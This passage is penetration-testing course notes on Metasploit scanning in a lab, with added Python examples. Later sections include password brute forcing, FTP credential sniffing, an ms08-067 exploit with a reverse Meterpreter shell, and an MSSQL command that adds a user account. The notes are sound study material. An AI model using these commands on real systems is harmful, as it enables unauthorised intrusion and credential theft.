These notes record the process of learning and using Kali Linux 2018.1 for penetration testing, following the course "Kali Linux Penetration Testing" on Security Niu Classroom.
Module location:
The information-gathering modules all live under auxiliary/scanner/. Type the path and press TAB to list them (the count depends on the Metasploit version installed):
msf > use auxiliary/scanner/ [TAB]
Display all 531 possibilities? (y or n)
1. db_nmap
Same syntax as nmap, but the results are written into the msf database (check db_status first; without a connected database nothing is stored):
msf > db_nmap -sV 10.10.10.0/24
auxiliary directory
RHOSTS vs RHOST: auxiliary scanner modules take RHOSTS, which accepts several targets at once, whereas most exploit modules take a single RHOST. RHOSTS accepts:
- ranges and CIDR blocks, separated by commas or spaces: 192.168.1.20-192.168.1.30, 192.168.1.0/24, 192.168.11.0/24
- a file with one entry per line: file:/root/h.txt
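To make the RHOSTS syntax concrete, here is an added Python example (not part of the original notes and not Metasploit's own parser) that expands the forms listed above into individual addresses, including the file: form. The host list it reads is a constructed temporary file standing in for /root/h.txt; how it treats comments in that file and host bits in a CIDR is this example's own choice, not a statement about msfconsole.

```python
import ipaddress
import os
import tempfile


def expand_rhosts(spec):
    """Expand an RHOSTS-style target specification into a list of IPv4 strings.

    Accepted forms, mirroring what msfconsole takes in RHOSTS: a single address,
    a CIDR block ("192.168.1.0/24"), a full range ("192.168.1.20-192.168.1.30"),
    a short range on the last octet ("10.10.10.100-150"), and "file:/path"
    naming a file with one entry per line. Entries are separated by commas
    and/or whitespace. Duplicates are dropped and first-seen order is kept, so
    a host listed twice is probed once.
    """
    out, seen = [], set()
    for token in spec.replace(",", " ").split():
        for ip in expand_one(token):
            if ip not in seen:
                seen.add(ip)
                out.append(ip)
    return out


def expand_one(token):
    """Yield the addresses denoted by one token (see expand_rhosts)."""
    if token.startswith("file:"):
        with open(token[5:], encoding="utf-8") as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith("#"):   # this example allows comments
                    yield from expand_one(line)
        return
    if "/" in token:
        # strict=False: "10.10.10.5/24" means the whole /24, host bits are ignored
        yield from (str(ip) for ip in ipaddress.ip_network(token, strict=False))
        return
    if "-" in token:
        lo, hi = token.split("-", 1)
        if "." not in hi:                          # short form: 10.10.10.100-150
            hi = lo.rsplit(".", 1)[0] + "." + hi
        start, end = ipaddress.ip_address(lo), ipaddress.ip_address(hi)
        if end < start:
            raise ValueError("range end precedes start: " + token)
        for n in range(int(start), int(end) + 1):
            yield str(ipaddress.ip_address(n))
        return
    yield str(ipaddress.ip_address(token))        # raises on a malformed literal


def demo_file_list():
    """Show the file: form with a constructed host list written to a temp file
    (stands in for the /root/h.txt of the notes; contents are made up)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("# constructed lab host list\n10.10.10.132\n10.10.10.147-148\n")
        path = fh.name
    try:
        return expand_rhosts("file:" + path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(expand_rhosts("192.168.1.20-192.168.1.30, 192.168.1.0/30"))
    print(demo_file_list())
```

Paths containing spaces cannot be given in the file: form here because the specification is split on whitespace; quote-aware splitting is left out to keep the example short.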
2. Host Discovery Scan
- use auxiliary/scanner/discovery/arp_sweep
set INTERFACE, RHOSTS, SHOST, SMAC, THREADS; run
ARP does not cross routers, so arp_sweep only finds hosts in the same broadcast domain as INTERFACE, and it needs root because it sends raw frames. SHOST/SMAC override the source IP/MAC in the requests; leave them unset to use the interface's own.
msf > search arp
msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(scanner/discovery/arp_sweep) > show options
msf auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 10.10.10.0/24
msf auxiliary(scanner/discovery/arp_sweep) > set INTERFACE eth0
msf auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf auxiliary(scanner/discovery/arp_sweep) > run
3. Port Scan
- use auxiliary/scanner/portscan/syn
set INTERFACE, PORTS, RHOSTS, THREADS; run
The SYN scanner crafts raw packets, so msfconsole must run as root. PORTS takes single ports and ranges (for example 22-25,80,443).
msf > search portscan
msf > use auxiliary/scanner/portscan/syn
msf auxiliary(scanner/portscan/syn) > show options
msf auxiliary(scanner/portscan/syn) > set INTERFACE eth0
msf auxiliary(scanner/portscan/syn) > set PORTS 80
msf auxiliary(scanner/portscan/syn) > set RHOSTS 10.10.10.0/24
msf auxiliary(scanner/portscan/syn) > set THREADS 50
msf auxiliary(scanner/portscan/syn) > run
4. Zombie (idle) scan
An idle scan needs a zombie: an otherwise idle host whose IP ID counter increases predictably with every packet it sends. ipidseq probes candidates and reports their IP ID sequence class; only "Incremental" (or "Broken little-endian incremental") hosts are usable.
- use auxiliary/scanner/ip/ipidseq
- set RHOSTS 192.168.1.0/24; run
Then scan the target through the zombie with nmap (-sI zombie target; -PN is the older spelling of -Pn and skips host discovery). The target only ever sees packets from the zombie's address; here 10.10.10.147 is the zombie and 10.10.10.132 the target:
nmap -PN -sI 10.10.10.147 10.10.10.132
msf > use auxiliary/scanner/ip/ipidseq
msf auxiliary(scanner/ip/ipidseq) > show options
msf auxiliary(scanner/ip/ipidseq) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/ip/ipidseq) > set THREADS 20
msf auxiliary(scanner/ip/ipidseq) > run
msf > db_nmap -PN -sI 10.10.10.147 10.10.10.132
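The logic the two commands above rely on, as an added Python example that is not from the notes, from nmap or from Metasploit: a simplified IP ID sequence classifier in the spirit of ipidseq (the class names follow nmap's; the "small increment" threshold is this example's own), plus the before/after IP ID comparison that -sI uses to decide whether a target port is open. All IP ID samples are constructed.

```python
"""IP ID sequence classification (what ipidseq reports) and the port-state
inference behind an idle scan (nmap -sI). Simplified, for illustration."""


def bswap16(value):
    """Swap the two bytes of a 16-bit IP ID (hosts that emit the counter little-endian)."""
    return ((value & 0xFF) << 8) | ((value >> 8) & 0xFF)


def diffs(ids):
    """Successive differences modulo 2^16, so a wrap from 65535 to 0 counts as +1."""
    return [(b - a) % 65536 for a, b in zip(ids, ids[1:])]


def classify_ipids(ids, max_step=10):
    """Classify IP IDs observed from back-to-back probes of one host.

    max_step (what still counts as a 'small' increment) is this example's own
    simplification of nmap's rules, not nmap's exact threshold.
    """
    if len(ids) < 2:
        raise ValueError("need at least two samples")
    if all(i == 0 for i in ids):
        return "All zeros"
    if len(set(ids)) == 1:
        return "Constant"
    raw = diffs(ids)
    if all(1 <= d <= max_step for d in raw):
        return "Incremental"
    swapped = diffs([bswap16(i) for i in ids])
    if all(1 <= d <= max_step for d in swapped):
        return "Broken little-endian incremental"
    if all(1 <= d < 0x8000 for d in raw):
        return "Random positive increments"
    return "Randomized"


def is_zombie_candidate(ids):
    """A usable zombie has a predictable global counter. It must also be idle:
    any other traffic it sends inflates the counter and corrupts the inference."""
    return classify_ipids(ids) in ("Incremental", "Broken little-endian incremental")


def ipid_step(ids):
    """Per-packet increment in wire-order units: 1 for Incremental,
    256 for Broken little-endian incremental."""
    cls = classify_ipids(ids)
    if cls == "Incremental":
        return 1
    if cls == "Broken little-endian incremental":
        return 256
    raise ValueError("not a usable zombie: " + cls)


def infer_port_state(ipid_before, ipid_after, step=1):
    """Idle-scan inference for one target port.

    Sequence: (1) probe the zombie and note its IP ID; (2) send a SYN to the
    target spoofed from the zombie's address; (3) probe the zombie again.
    Open port:   target sends SYN/ACK to the zombie, zombie answers RST (+1 step),
                 plus the reply to our second probe (+1 step): delta == 2 * step.
    Closed port: target sends RST to the zombie, which ignores it: delta == step.
    Filtered:    nothing reaches the zombie, also delta == step (indistinguishable).
    """
    delta = (ipid_after - ipid_before) % 65536
    if delta == step:
        return "closed|filtered"
    if delta == 2 * step:
        return "open"
    return "unknown (zombie not idle or wrong step)"


if __name__ == "__main__":
    # constructed samples, not real scan output
    for sample in ([0] * 6, [4130, 4131, 4132, 4133, 4134, 4135],
                   [0x1200, 0x1300, 0x1400, 0x1500, 0x1600, 0x1700],
                   [31337, 4000, 60000, 12, 9999, 777]):
        print(sample, "->", classify_ipids(sample))
    print(infer_port_state(4136, 4138))
```

Because a closed and a filtered port both leave the zombie's counter at +1, an idle scan can never tell those two apart; that is why nmap reports them as closed|filtered.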
5. UDP Scan
- use auxiliary/scanner/discovery/udp_sweep
- use auxiliary/scanner/discovery/udp_probe
Both send application-layer probes for common UDP services (DNS, SNMP, NTP, NetBIOS, portmap and others) and report the hosts that answer, which is far more reliable than waiting for ICMP port-unreachable messages; udp_probe additionally lets CHOST set the source address of the probes.
msf > use auxiliary/scanner/discovery/udp_sweep
msf auxiliary(scanner/discovery/udp_sweep) > show options
msf auxiliary(scanner/discovery/udp_sweep) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/discovery/udp_sweep) > run
msf > use auxiliary/scanner/discovery/udp_probe
msf auxiliary(scanner/discovery/udp_probe) > show options
msf auxiliary(scanner/discovery/udp_probe) > set RHOSTS 10.10.10.100-150
msf auxiliary(scanner/discovery/udp_probe) > set CHOST 10.10.10.131
msf auxiliary(scanner/discovery/udp_probe) > set THREADS 20
msf auxiliary(scanner/discovery/udp_probe) > run
6. Password Sniffing
- use auxiliary/sniffer/psnuffle
- Can also extract passwords from a pcap capture file (PCAPFILE) instead of sniffing a live interface
- Function similar to dsniff
Currently only supports pop3, imap, ftp and HTTP GET credentials
msf > search sniffer
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(sniffer/psnuffle) > show options
msf auxiliary(sniffer/psnuffle) > set INTERFACE eth0
msf auxiliary(sniffer/psnuffle) > run
In a second terminal, log in to the lab FTP server so that a cleartext credential crosses the wire:
root@kali:~# ftp 10.10.10.148
# continuing from above: stop the live sniffer job (jobs lists it, kill 0 stops job 0) and run again against a capture file
msf auxiliary(sniffer/psnuffle) > show options
msf auxiliary(sniffer/psnuffle) > set PCAPFILE /root/ftp.pcapng
msf auxiliary(sniffer/psnuffle) > jobs
msf auxiliary(sniffer/psnuffle) > kill 0
msf auxiliary(sniffer/psnuffle) > run
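What psnuffle's ftp sniffer does with PCAPFILE, as an added Python example (not Metasploit code and not from the notes): a minimal classic-pcap reader that reassembles client-to-server FTP commands per flow and reports USER/PASS pairs. The capture it parses is constructed inside the block; the addresses, username and password are made up for the lab. It handles classic .pcap only; a .pcapng file like the one in the notes would need converting first (for example editcap -F pcap).

```python
"""Pull FTP USER/PASS pairs out of a classic libpcap capture, the way psnuffle's
ftp sniffer does when given PCAPFILE. Only Ethernet/IPv4/TCP is handled."""
import struct

LINKTYPE_ETHERNET = 1


def ipv4_bytes(dotted):
    return bytes(int(o) for o in dotted.split("."))


def ipv4_str(raw):
    return ".".join(str(b) for b in raw)


def build_tcp_frame(src, dst, sport, dport, payload, flags=0x18):
    """Ethernet/IPv4/TCP frame. Checksums stay zero: this parser (like most
    sniffers) never verifies them, which is fine for constructed traffic."""
    eth = b"\x00\x0c\x29\x00\x00\x02" + b"\x00\x0c\x29\x00\x00\x01" + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0x1234, 0x4000, 64, 6, 0,
                     ipv4_bytes(src), ipv4_bytes(dst))
    return eth + ip + tcp


def build_pcap(frames):
    """Wrap Ethernet frames in a little-endian libpcap 2.4 file."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_500_000_000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_segments(pcap):
    """Yield (src_ip, dst_ip, sport, dport, payload) for each IPv4/TCP packet."""
    magic = pcap[:4]
    if magic == b"\xd4\xc3\xb2\xa1":
        end = "<"
    elif magic == b"\xa1\xb2\xc3\xd4":
        end = ">"
    else:
        raise ValueError("not a classic pcap file (convert pcapng first, e.g. editcap -F pcap)")
    if struct.unpack(end + "I", pcap[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only the Ethernet link type is handled")
    pos = 24
    while pos + 16 <= len(pcap):
        _, _, incl_len, _ = struct.unpack(end + "IIII", pcap[pos:pos + 16])
        frame = pcap[pos + 16:pos + 16 + incl_len]
        pos += 16 + incl_len
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":    # not IPv4
            continue
        ip = frame[14:]
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        if ip[9] != 6 or len(ip) < total_len:                  # not TCP, or truncated
            continue
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        yield ipv4_str(ip[12:16]), ipv4_str(ip[16:20]), sport, dport, tcp[data_off:]


def extract_ftp_creds(pcap, ftp_port=21):
    """One dict per completed USER/PASS exchange in client->server traffic.
    Lines are reassembled per flow, so a command split across segments still matches."""
    creds, pending_bytes, pending_user = [], {}, {}
    for src, dst, sport, dport, payload in iter_tcp_segments(pcap):
        if dport != ftp_port or not payload:
            continue
        flow = (src, dst, sport)
        buf = pending_bytes.get(flow, b"") + payload
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            cmd, _, arg = line.decode("latin-1").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                pending_user[flow] = arg
            elif cmd == "PASS" and flow in pending_user:
                creds.append({"client": src, "server": dst,
                              "user": pending_user.pop(flow), "password": arg})
        pending_bytes[flow] = buf
    return creds


# Constructed capture: Kali (10.10.10.131) logging in to the lab FTP server
# (10.10.10.148). The PASS line is deliberately split across two segments.
SAMPLE_PCAP = build_pcap([
    build_tcp_frame("10.10.10.148", "10.10.10.131", 21, 40000, b"220 FTP server ready\r\n"),
    build_tcp_frame("10.10.10.131", "10.10.10.148", 40000, 21, b"USER ftpuser\r\n"),
    build_tcp_frame("10.10.10.148", "10.10.10.131", 21, 40000, b"331 Please specify the password.\r\n"),
    build_tcp_frame("10.10.10.131", "10.10.10.148", 40000, 21, b"PASS Win"),
    build_tcp_frame("10.10.10.131", "10.10.10.148", 40000, 21, b"ter2018\r\n"),
])

if __name__ == "__main__":
    print(extract_ftp_creds(SAMPLE_PCAP))
    # real file: extract_ftp_creds(open("/root/ftp.pcap", "rb").read())
```

Reassembly is the part worth copying: a sniffer that matches "PASS " only inside single segments misses credentials whenever the client's TCP stack splits the line, which happens with interactive typing.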
7. SNMP Scanning
- vim /etc/snmp/snmpd.conf (on the Linux lab target: change the agentAddress line so snmpd listens on 0.0.0.0:161 instead of only 127.0.0.1, then restart snmpd)
- use auxiliary/scanner/snmp/snmp_login (guesses community strings from a wordlist; without a valid community nothing else works)
- use auxiliary/scanner/snmp/snmp_enum (dumps system, interface, process and software information using a known community)
- use auxiliary/scanner/snmp/snmp_enumusers (Windows)
- use auxiliary/scanner/snmp/snmp_enumshares (Windows)
Community-string guessing against the first target:
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) > show options
msf auxiliary(scanner/snmp/snmp_login) > set RHOSTS 10.10.10.149
msf auxiliary(scanner/snmp/snmp_login) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_login) > run
Enumeration with the default community (public):
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.149
msf auxiliary(scanner/snmp/snmp_enum) > run
# Against the Windows host (10.10.10.142) the default community returns nothing; set the community string configured on that SNMP server (jlcssadmin in this lab) and run again
msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) > show options
msf auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.10.142
msf auxiliary(scanner/snmp/snmp_enum) > run
msf auxiliary(scanner/snmp/snmp_enum) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enum) > set THREADS 20
msf auxiliary(scanner/snmp/snmp_enum) > run
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > show options
msf auxiliary(scanner/snmp/snmp_enumusers) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumusers) > set RHOSTS 10.10.10.142
msf auxiliary(scanner/snmp/snmp_enumusers) > run
msf > use auxiliary/scanner/snmp/snmp_enumshares
msf auxiliary(scanner/snmp/snmp_enumshares) > show options
msf auxiliary(scanner/snmp/snmp_enumshares) > set COMMUNITY jlcssadmin
msf auxiliary(scanner/snmp/snmp_enumshares) > set RHOSTS 10.10.10.142
msf auxiliary(scanner/snmp/snmp_enumshares) > run
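One round trip of the community-string check behind snmp_login, as an added Python example that is not from the notes or from Metasploit: a hand-rolled BER encoder for an SNMP GetRequest on sysDescr.0, a decoder for the GetResponse, and a probe that reports whether the agent accepted the community. The sample response is constructed; probe_community needs a reachable agent on UDP 161 and is not exercised by the embedded sample.

```python
"""SNMPv1/v2c community probe: encode a GetRequest for sysDescr.0, decode the
GetResponse. snmp_login does one such round trip per community string."""
import random
import socket

SYS_DESCR = "1.3.6.1.2.1.1.1.0"


def ber_tlv(tag, payload):
    n = len(payload)
    if n < 0x80:
        length = bytes([n])
    else:                                    # long form: 0x8N then N length bytes
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + payload


def ber_int(value):
    return ber_tlv(0x02, value.to_bytes(value.bit_length() // 8 + 1, "big", signed=True))


def ber_oid(dotted):
    parts = [int(p) for p in dotted.split(".")]
    body = bytearray([40 * parts[0] + parts[1]])
    for p in parts[2:]:                      # base-128, high bit set on all but the last byte
        chunk = [p & 0x7F]
        p >>= 7
        while p:
            chunk.insert(0, 0x80 | (p & 0x7F))
            p >>= 7
        body += bytes(chunk)
    return ber_tlv(0x06, bytes(body))


def build_get_request(community, oid=SYS_DESCR, request_id=None, version=1):
    """version on the wire: 0 = SNMPv1, 1 = SNMPv2c."""
    if request_id is None:
        request_id = random.randint(1, 0x7FFFFFFF)
    varbinds = ber_tlv(0x30, ber_tlv(0x30, ber_oid(oid) + ber_tlv(0x05, b"")))
    pdu = ber_tlv(0xA0, ber_int(request_id) + ber_int(0) + ber_int(0) + varbinds)
    return ber_tlv(0x30, ber_int(version) + ber_tlv(0x04, community.encode()) + pdu)


def read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def ber_decode(tag, payload):
    if tag == 0x02:
        return int.from_bytes(payload, "big", signed=True)
    if tag == 0x04:
        return payload
    if tag == 0x05:
        return None
    if tag == 0x06:
        ids, val = [payload[0] // 40, payload[0] % 40], 0
        for b in payload[1:]:
            val = (val << 7) | (b & 0x7F)
            if not b & 0x80:
                ids.append(val)
                val = 0
        return ".".join(map(str, ids))
    if tag in (0x30, 0xA0, 0xA2):            # SEQUENCE, GetRequest, GetResponse
        items, pos = [], 0
        while pos < len(payload):
            t, p, pos = read_tlv(payload, pos)
            items.append(ber_decode(t, p))
        return items
    return payload                            # Counter32/Gauge32/TimeTicks/IpAddress left raw


def parse_response(data):
    """Decode a GetResponse datagram; None for anything else or malformed input."""
    try:
        tag, msg, _ = read_tlv(data, 0)
        fields, pos = [], 0
        while pos < len(msg):
            t, p, pos = read_tlv(msg, pos)
            fields.append((t, p))
        (_, ver), (_, comm), (pdu_tag, pdu) = fields
        if tag != 0x30 or pdu_tag != 0xA2:
            return None
        request_id, error_status, _, varbinds = ber_decode(0x30, pdu)
    except (IndexError, ValueError, TypeError):
        return None
    return {"version": ber_decode(0x02, ver), "community": comm.decode("latin-1"),
            "request_id": request_id, "error_status": error_status,
            "varbinds": [tuple(vb) for vb in varbinds]}


def probe_community(host, community, timeout=2.0):
    """True when the agent answers our request-id without error. Silence means a
    wrong community (v1/v2c agents drop those without replying) or filtered UDP 161."""
    rid = random.randint(1, 0x7FFFFFFF)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_get_request(community, request_id=rid), (host, 161))
        try:
            data, _ = s.recvfrom(4096)
        except socket.timeout:
            return False
    resp = parse_response(data)
    return bool(resp and resp["request_id"] == rid and resp["error_status"] == 0)


# Constructed sample of an agent's answer for sysDescr.0 (not captured output).
SAMPLE_RESPONSE = ber_tlv(0x30, ber_int(1) + ber_tlv(0x04, b"public") + ber_tlv(
    0xA2, ber_int(7) + ber_int(0) + ber_int(0) + ber_tlv(
        0x30, ber_tlv(0x30, ber_oid(SYS_DESCR) + ber_tlv(0x04, b"Linux lab 4.9.0")))))
```

Matching the request-id is what separates a real answer from a stale or spoofed datagram, and it is the reason a wrong community produces no reply at all rather than an error: a v1/v2c agent simply discards the request, so a wordlist run is bounded by the timeout per guess, not by the agent.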
8. SMB Scan
SMB version scan (also returns the OS and workgroup/domain; no credentials needed)
- use auxiliary/scanner/smb/smb_version
Named-pipe audit: which SMB named pipes the host exposes (optional account/password)
- use auxiliary/scanner/smb/pipe_auditor
DCERPC services reachable through SMB named pipes (optional account/password)
- use auxiliary/scanner/smb/pipe_dcerpc_auditor
SMB share enumeration (optional account/password)
- use auxiliary/scanner/smb/smb_enumshares
SMB user enumeration (optional account/password)
- use auxiliary/scanner/smb/smb_enumusers
SID/RID enumeration of users and groups via LSARPC (optional account/password)
- use auxiliary/scanner/smb/smb_lookupsid
Credentials go in SMBUser and SMBPass. Each module is run anonymously first; the credentialed rerun below is needed on hosts that refuse null sessions.
SMB version scan
msf > search smb
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 10.10.10.147, 10.10.10.148, 10.10.10.142
msf auxiliary(scanner/smb/smb_version) > run
# continuing from above, with credentials (the option names are SMBUser and SMBPass)
msf auxiliary(scanner/smb/smb_version) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_version) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_version) > run
Named-pipe audit (optional account/password)
msf > use auxiliary/scanner/smb/pipe_auditor
msf auxiliary(scanner/smb/pipe_auditor) > show options
msf auxiliary(scanner/smb/pipe_auditor) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/pipe_auditor) > run
# continuing from above
msf auxiliary(scanner/smb/pipe_auditor) > set SMBUser Administrator
msf auxiliary(scanner/smb/pipe_auditor) > set SMBPass 123456
msf auxiliary(scanner/smb/pipe_auditor) > run
DCERPC services reachable through SMB named pipes
msf > use auxiliary/scanner/smb/pipe_dcerpc_auditor
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > show options
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
# continuing from above
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBUser Administrator
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > set SMBPass 123456
msf auxiliary(scanner/smb/pipe_dcerpc_auditor) > run
SMB share enumeration (optional account/password)
msf > use auxiliary/scanner/smb/smb_enumshares
msf auxiliary(scanner/smb/smb_enumshares) > show options
msf auxiliary(scanner/smb/smb_enumshares) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/smb_enumshares) > run
# continuing from above
msf auxiliary(scanner/smb/smb_enumshares) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_enumshares) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_enumshares) > run
SMB user enumeration (optional account/password)
msf > use auxiliary/scanner/smb/smb_enumusers
msf auxiliary(scanner/smb/smb_enumusers) > show options
msf auxiliary(scanner/smb/smb_enumusers) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/smb_enumusers) > run
# continuing from above
msf auxiliary(scanner/smb/smb_enumusers) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_enumusers) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_enumusers) > run
SID enumeration (optional account/password)
msf > use auxiliary/scanner/smb/smb_lookupsid
msf auxiliary(scanner/smb/smb_lookupsid) > show options
msf auxiliary(scanner/smb/smb_lookupsid) > set RHOSTS 10.10.10.148
msf auxiliary(scanner/smb/smb_lookupsid) > run
# continuing from above
msf auxiliary(scanner/smb/smb_lookupsid) > set SMBUser Administrator
msf auxiliary(scanner/smb/smb_lookupsid) > set SMBPass 123456
msf auxiliary(scanner/smb/smb_lookupsid) > run
9. SSH Scan
SSH version scan
- use auxiliary/scanner/ssh/ssh_version
SSH password brute force
- use auxiliary/scanner/ssh/ssh_login
- set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt; set VERBOSE false; run
(the wordlist has one "user password" pair per line; VERBOSE false only hides the failed attempts from the console, every attempt still lands in the target's auth log and counts toward any lockout policy)
SSH public key login
- use auxiliary/scanner/ssh/ssh_login_pubkey
- set KEY_PATH id_rsa; set USERNAME root; run (older Metasploit releases called this option KEY_FILE)
SSH version scan
msf > use auxiliary/scanner/ssh/ssh_version
msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ssh/ssh_version) > run
SSH password brute force
root@kali:~# more /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(scanner/ssh/ssh_login) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(scanner/ssh/ssh_login) > set VERBOSE false
msf auxiliary(scanner/ssh/ssh_login) > run
SSH public key login
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set RHOSTS 10.10.10.132
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set USERNAME root
msf auxiliary(scanner/ssh/ssh_login_pubkey) > set KEY_PATH id_rsa_test_file
msf auxiliary(scanner/ssh/ssh_login_pubkey) > run
10. Windows missing patches
- A post module: it runs inside a session already obtained on the target
use post/windows/gather/enum_patches
- show advanced
- set VERBOSE yes
If the check fails:
- the module's WMI query has a known bug; migrate Meterpreter into another process and run the module again
ms08-067 (to obtain a session first; note that exploits take a single RHOST, not RHOSTS)
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > set RHOST 10.10.10.147
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) > run
meterpreter > background
msf exploit(windows/smb/ms08_067_netapi) > sessions
msf exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches
msf post(windows/gather/enum_patches) > set SESSION 4
msf post(windows/gather/enum_patches) > run
# process error: migrate to another process (here spoolsv.exe, PID 828 in the ps output) and run again
msf post(windows/gather/enum_patches) > sessions -i 4
meterpreter > getpid
meterpreter > ps
meterpreter > migrate 828
meterpreter > background
msf post(windows/gather/enum_patches) > run
11. mssql scan
mssql scan port
- TCP 1433 for the default instance (named instances get a dynamic port) / UDP 1434 (SQL Server Browser service; query it to learn each instance's TCP port)
- use auxiliary/scanner/mssql/mssql_ping
Brute-forcing the mssql password
- use auxiliary/scanner/mssql/mssql_login
Remote code execution (after obtaining database credentials; the module runs CMD through xp_cmdshell, so the login needs sysadmin rights)
- use auxiliary/admin/mssql/mssql_exec
- set CMD net user user1 pass123 /ADD
mssql scan port
msf > use auxiliary/scanner/mssql/mssql_ping
msf auxiliary(scanner/mssql/mssql_ping) > set RHOSTS 10.10.10.142
msf auxiliary(scanner/mssql/mssql_ping) > run
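The UDP 1434 exchange that mssql_ping performs, as an added Python example (not the module's code and not from the notes): the one-byte SQL Server Resolution Protocol request and a parser for the Browser service's SVR_RESP answer, which is where a named instance's dynamic TCP port comes from. The sample answer is constructed; the server name, instance names and ports in it are made up.

```python
"""SQL Server Resolution Protocol (MS-SQLR) over UDP 1434: the request mssql_ping
sends and how the SQL Browser service's answer is read."""
import socket

CLNT_BCAST_EX = b"\x02"      # to the subnet broadcast address: every browser answers
CLNT_UCAST_EX = b"\x03"      # to one host: list all of its instances
SVR_RESP = 0x05


def parse_svr_resp(data):
    """Parse a SVR_RESP datagram: 0x05, little-endian 16-bit length, then
    "key;value;...;;" records, one per instance. Returns a list of dicts."""
    if len(data) < 3 or data[0] != SVR_RESP:
        raise ValueError("not a SQL Browser SVR_RESP")
    length = int.from_bytes(data[1:3], "little")
    text = data[3:3 + length].decode("latin-1")
    instances = []
    for record in text.split(";;"):
        fields = record.strip(";").split(";")
        if len(fields) < 2:
            continue
        inst = dict(zip(fields[0::2], fields[1::2]))
        if "tcp" in inst:
            inst["tcp"] = int(inst["tcp"])
        instances.append(inst)
    return instances


def tcp_ports(instances):
    """Map instance name -> TCP port: the fact a named instance reveals only here."""
    return {i["InstanceName"]: i["tcp"] for i in instances if "tcp" in i}


def mssql_ping(host, timeout=2.0):
    """Query one host's browser service. Empty list: no browser running, or UDP 1434 filtered."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(CLNT_UCAST_EX, (host, 1434))
        try:
            data, _ = s.recvfrom(65535)
        except socket.timeout:
            return []
    return parse_svr_resp(data)


def build_svr_resp(text):
    """Encode a response the way the browser does (used here to construct the sample)."""
    body = text.encode("latin-1")
    return bytes([SVR_RESP]) + len(body).to_bytes(2, "little") + body


# Constructed sample: a default instance on 1433 and a named instance on a dynamic port.
SAMPLE_SVR_RESP = build_svr_resp(
    "ServerName;WIN2K3;InstanceName;MSSQLSERVER;IsClustered;No;Version;9.00.1399.06;tcp;1433;;"
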